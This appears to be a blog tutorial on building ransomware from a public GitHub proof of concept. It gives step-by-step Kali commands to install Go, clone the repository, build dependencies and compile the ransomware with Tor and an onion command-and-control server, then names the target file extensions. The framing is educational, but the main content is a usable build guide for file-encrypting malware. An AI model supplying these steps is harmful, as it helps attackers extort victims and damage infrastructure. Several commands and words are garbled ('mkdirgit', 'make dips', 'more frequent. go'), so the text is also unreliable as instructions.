Ransomware: Build Your Own Ransomware
Ransomware is quickly becoming the most serious form of malware that affects our digital systems. Many forms of malware are attacking companies around the world, including the new snake, which is specifically designed for SCADA/ICS systems. This ransomware poses a threat to national infrastructure and industrial systems. The ransom was paid for $5 million by the Colonial Pipeline in the US. CNA, a major US insurance company, recently admitted that it had paid $40 million in ransom! Ransomware is becoming more sophisticated and malicious.
Let’s create our own ransomware using a Proof of Concept (POC), available from mauri870 at github.com. This ransomware was created by him as part of an academic program. It is not malicious in nature, but it is meant to help us understand ransomware. This malware, like the Snake variant and many other malware strains, is written in Golang.
This malware encrypts files in the background using AES256-CTR and uses RSA-4096 for data exchange with the server. This ransomware looks very similar to Cryptolocker which is one of the most popular ransomware attacks ever.
Step 1: Download and install the Binaries
First, fire up Kali and ensure that golang has been installed. You can download it from the Kali repositories, by entering
kali > sudo apt install golang
Next, log in to root user.
kali>mkdirgit
Next, change directory (cd), to this directory.
kali> cdgit
Next, download the binaries from
kali > git clone https://github.com/mauri870/ransomware
Step 2: Export GO Environment variables
Next, we will need to define environment variables that direct binaries and GO the correct directories.
Step 3: Determine the source code dependencies
Once the variables have been exported and set, it is time to create the dependencies. Navigate to ransomware and type make dips.
kali > cd ransomware
kali > make deps
Step 4: Create the Source Code using options
Once we have finished the steps makes, we can start to create the source code. We will be using a few options in our case.
ToR is the first option. This will encrypt all communications sent over the ToR network.
USE_TOR=true
Second, we want to use our dark webserver at hackersarisegtdj. onion (you can use any domain or localhost).
SERVER_HOST=hackersarisegtdj.onion
We want to use Port 80 (you can use any port).
SERVER_PORT=80
Finally, we need to configure the operating system to compile our source code, in this instance Linux.
GOOS=linux
This should be the command we send.
kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux
Hit ENTER to watch your ransomware build.
Step 5 – Check the Directory for ransomware.
After the source code is generated, you can do a lengthy listing in the ransomware directory.
kali> ls
Navigate to the bin directory.
kali
You will find the ransomware.exe and the server.
Step 6 – Examine the Types Of Files To Be Encrypted
Navigate to cmd directory to open common.
kali > Cd cmd
Kali > more frequent. go
This section shows you the file extensions this ransomware will encrypt when it is executed.
Summary
Ransomware is the most serious threat to our digital systems right now. The Colonial Pipeline attack has clearly shown that almost everyone is at risk. If SCADA/ICS systems are compromised, there could be serious economic and infrastructure ramifications.
This POC of Ransomware will allow you to understand ransomware better and help you test your systems to determine if they are susceptible.
This is the second part of this series. We will be testing this ransomware on a Windows VM.